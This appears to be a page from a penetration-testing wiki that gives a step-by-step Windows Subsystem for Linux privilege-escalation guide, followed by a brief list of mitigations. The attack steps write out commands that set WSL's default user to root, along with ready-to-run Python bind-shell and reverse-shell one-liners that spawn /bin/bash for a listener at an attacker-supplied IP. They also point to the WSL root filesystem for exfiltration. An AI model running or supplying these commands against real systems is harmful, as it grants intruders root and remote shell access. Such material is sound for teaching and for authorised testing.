EoP - Windows Subsystem for Linux (WSL)

Key Exploitation Points

  1. Default User Configuration: WSL allows setting the default user to root, granting administrative privileges.

  2. Network Access: Root access enables opening any port, facilitating bind or reverse shells.

  3. Filesystem Access: WSL’s filesystem integration allows exploration and potential data exfiltration.

Step-by-Step Exploitation Guide

1. Verifying WSL Installation

Confirm WSL is installed and configured:

wsl --list --verbose

This will list installed distributions and their states.

2. Changing the Default User to Root

Gain root privileges by changing the default user:

C:\path\to\your\distribution.exe config --default-user root

Example for Ubuntu:

C:\Ubuntu.exe config --default-user root

3. Verifying Root Access

After setting the default user to root, confirm by running:

wsl whoami

Output: Should return root.

4. Establishing a Bind or Reverse Shell

Once you have root access, use Python to establish a shell:

Bind Shell

Opens a port for incoming connections:

wsl python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("0.0.0.0", PORT));s.listen(1);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);pty.spawn("/bin/bash")'

Replace PORT with the desired listening port.

Reverse Shell

Connects back to an external listener:

wsl python -c 'import socket,os,pty;s=socket.socket();s.connect(("YOUR_IP", YOUR_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

Replace YOUR_IP and YOUR_PORT with the attacker's IP and port.

5. Accessing the WSL Filesystem

The WSL filesystem can be explored directly from Windows:

C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

This location contains the root filesystem of the WSL environment.

6. Alternative Access via bash.exe

Access WSL through bash.exe:

C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe

Run bash.exe to enter the WSL environment directly.

Mitigation Strategies

To secure systems against unauthorized WSL exploitation:

1. Limit WSL Use

Restrict access to WSL, especially for non-administrative users on sensitive systems.

2. Configure User Permissions

Ensure the default user cannot be set to root without administrative approval.

3. Network Security

Monitor and restrict ports opened by WSL to prevent unauthorized bind or reverse shells.

4. Audit WSL Activity

Regularly review WSL configurations and logs for signs of unauthorized changes or suspicious activity.

5. Keep Systems Updated

Ensure both Windows and WSL are up-to-date with the latest security patches.

References

PreviousEoP - Incorrect permissions in servicesNextEoP - Unquoted Service Paths

Last updated